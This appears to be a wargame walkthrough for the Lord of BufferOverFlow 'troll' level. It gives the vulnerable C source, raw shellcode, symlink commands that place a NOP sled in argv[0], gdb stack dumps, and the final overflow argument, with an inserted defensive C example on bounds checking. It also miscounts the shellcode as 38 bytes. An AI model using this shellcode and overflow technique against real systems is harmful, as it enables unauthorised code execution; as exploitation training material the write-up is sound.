
[Lord Of BufferOverFlow] #8 orge -> troll

login : orge

password : timewalker

 

/*
        The Lord of the BOF : The Fellowship of the BOF
        - troll
        - check argc + argv hunter
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, strlen, strcpy */

extern char **environ;

int main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        // here is changed
        if(argc != 2){
                printf("argc must be two!\n");
                exit(0);
        }

        // egghunter: wipe every environment string
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument (48 bytes still allowed into a 40-byte buffer)
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);

        // one more! wipe argv[1] as well
        memset(argv[1], 0, strlen(argv[1]));

        return 0;
}

argc must be 2.

It also overwrites argv[1] with zeros, so the payload cannot be placed in argv[1].
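As an added example (not part of the LOB troll source or of this write-up), the C program below reproduces troll's three argument checks in the order the source applies them and sets a bounds-checked copy beside the strcpy. The names troll_filter, safe_copy, verdict_for_length and safe_copy_accepts are this example's own. It shows two things the source implies: the length check rejects only arguments longer than 48 bytes while the buffer is 40 bytes, so the longest accepted argument still overruns the buffer by 8 bytes; and because byte 47 is tested before the length, an over-long argument whose byte 47 is not 0xbf is reported as "stack is still your friend." rather than "argument is too long!".

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 40   /* troll's buffer[40] */
#define MAX_ARG  48   /* troll only rejects strlen(argv[1]) > 48 */

/* Which of troll's three checks fires, or ACCEPT if strcpy would run. */
enum verdict {
    REJECT_ARGC,     /* "argc must be two!" */
    REJECT_BYTE47,   /* "stack is still your friend." */
    REJECT_LENGTH,   /* "argument is too long!" */
    ACCEPT
};

/* Mirrors troll's checks in the same order: byte 47 is tested before the
 * length.  troll reads argv[1][47] unconditionally; the strlen guard here
 * only keeps this example from reading past a short argument. */
enum verdict troll_filter(int argc, const char *arg)
{
    if (argc != 2)
        return REJECT_ARGC;
    if (strlen(arg) < 48 || arg[47] != '\xbf')
        return REJECT_BYTE47;
    if (strlen(arg) > MAX_ARG)
        return REJECT_LENGTH;
    return ACCEPT;          /* up to 48 bytes are now copied into 40 */
}

/* Hardened replacement for strcpy(buffer, argv[1]): refuses any source that
 * does not fit dst together with its terminator.  Returns 1 on copy, 0 on
 * refusal. */
int safe_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (len >= dst_size)
        return 0;
    memcpy(dst, src, len + 1);
    return 1;
}

/* Constructed test input: n bytes of 'A' with byte 47 set to 0xbf, the
 * shape of the write-up's "A"*44 + address argument.  n must be < 256. */
static void fill_arg(char *out, size_t n)
{
    memset(out, 'A', n);
    if (n > 47)
        out[47] = '\xbf';
    out[n] = '\0';
}

/* troll's verdict on such an argument of n bytes. */
enum verdict verdict_for_length(size_t n)
{
    char arg[256];
    fill_arg(arg, n);
    return troll_filter(2, arg);
}

/* 1 if safe_copy lets an n-byte argument into a 40-byte buffer, else 0. */
int safe_copy_accepts(size_t n)
{
    char arg[256];
    char buffer[BUF_SIZE];
    fill_arg(arg, n);
    return safe_copy(buffer, sizeof buffer, arg);
}

int main(void)
{
    size_t n;
    for (n = 39; n <= 49; n++)
        printf("%2zu bytes: troll %s, safe_copy %s\n", n,
               verdict_for_length(n) == ACCEPT ? "accepts" : "rejects",
               safe_copy_accepts(n) ? "copies" : "refuses");
    return 0;
}
```

safe_copy refuses anything that would not fit together with its terminator, which is exactly the check troll's `> 48` test is not; built with a C99 compiler, the loop in main prints both verdicts for argument lengths 39 to 49, and lengths 41 to 48 are the ones troll copies but safe_copy refuses.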

 

argv[0] can still be attacked.

As in the previous level, I will use a symbolic link.

 

If the shellcode contains \x2f, that byte is interpreted as '/', so the symbolic link is not created properly.

So let's use a different shellcode.

\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

38 bytes

 

cp troll test

ln -s test `python -c 'print"\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

 

After creating the symbolic link

 

./`python -c 'print"\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print"a"*44+"\xbf\xbf\xbf\xbf"'`

 

Open the core file in gdb

0xbffffa70:     0xbffffa9d      0x00000000      0x00000000      0x00000000
0xbffffa80:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffa90:     0x00000000      0x00000000      0x00000000      0x38366900
0xbffffaa0:     0x2f2e0036      0x90909090      0x90909090      0x90909090
0xbffffab0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffac0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffad0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffae0:     0x90909090      0x90909090      0x90909090      0x90909090

Remove the existing symbolic link

 rm `python -c 'print"\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

 

Create the symbolic link to the original file again

ln -s troll `python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

 

Put in the address 0xbffffac0 found from the core

`python -c 'print "A"*44 +"\xc0\xfa\xff\xbf"'`

It took me over an hour of fumbling around;

Why on earth does "stack is still your friend." keep showing up.....

I don't want to be friends with the stack;

 

aspirin